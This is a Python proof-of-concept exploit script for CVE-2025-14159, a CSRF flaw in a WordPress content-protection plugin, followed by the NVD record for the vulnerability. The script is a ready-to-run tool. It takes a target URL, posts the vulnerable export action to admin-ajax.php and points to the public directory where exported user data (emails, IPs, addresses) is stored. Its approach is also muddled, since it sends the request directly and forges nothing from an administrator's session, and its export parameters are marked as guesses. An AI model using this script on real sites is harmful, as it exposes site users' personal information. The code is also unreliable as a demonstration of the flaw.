CVE-2025-14159

import requests import sys # CVE-2025-14159 CSRF PoC # Exploits missing nonce validation in 'ays_sccp_results_export_file' AJAX action # Target: WordPress site with Secure Copy Content Protection plugin < 4.9.3 def exploit_csrf(target_url): """ Craft and send CSRF attack to export sensitive plugin data """ ajax_endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # Malicious payload - triggers data export without nonce validation data = { 'action': 'ays_sccp_results_export_file', # Additional parameters may be required based on plugin version 'ays_sccp_export_type': 'results', 'ays_sccp_export_file': 'csv' } print(f"[*] Sending CSRF request to: {ajax_endpoint}") print(f"[*] Action: {data['action']}") try: response = requests.post(ajax_endpoint, data=data, timeout=30) print(f"[+] Response Status: {response.status_code}") print(f"[*] Response Content: {response.text[:500]}") # Check if export was successful if response.status_code == 200: print("[+] CSRF attack executed - exported file may be accessible") # Export files are typically stored in wp-content/uploads/sccp_exports/ export_path = f"{target_url.rstrip('/')}/wp-content/uploads/sccp_exports/" print(f"[*] Check export directory: {export_path}") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com") sys.exit(1) target = sys.argv[1] exploit_csrf(target)

{"cve": {"id": "CVE-2025-14159", "sourceIdentifier": "[email protected]", "published": "2025-12-12T12:15:46.220", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.9.2. This is due to missing nonce validation on the 'ays_sccp_results_export_file' AJAX action. This makes it possible for unauthenticated attackers to export sensitive plugin data including email addresses, IP addresses, physical addresses, user IDs, and other user information via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The exported data is stored in a publicly accessible file, allowing attackers to receive the sensitive information even though they are not authenticated."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.8.7/admin/class-secure-copy-content-protection-admin.php#L645", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.3/admin/class-secure-copy-content-protection-admin.php#L696", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/secure-copy-content-protection/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7cffe04e-a2e5-4752-a5c1-7c95f0007e0b?source=cve", "source": "[email protected]"}]}}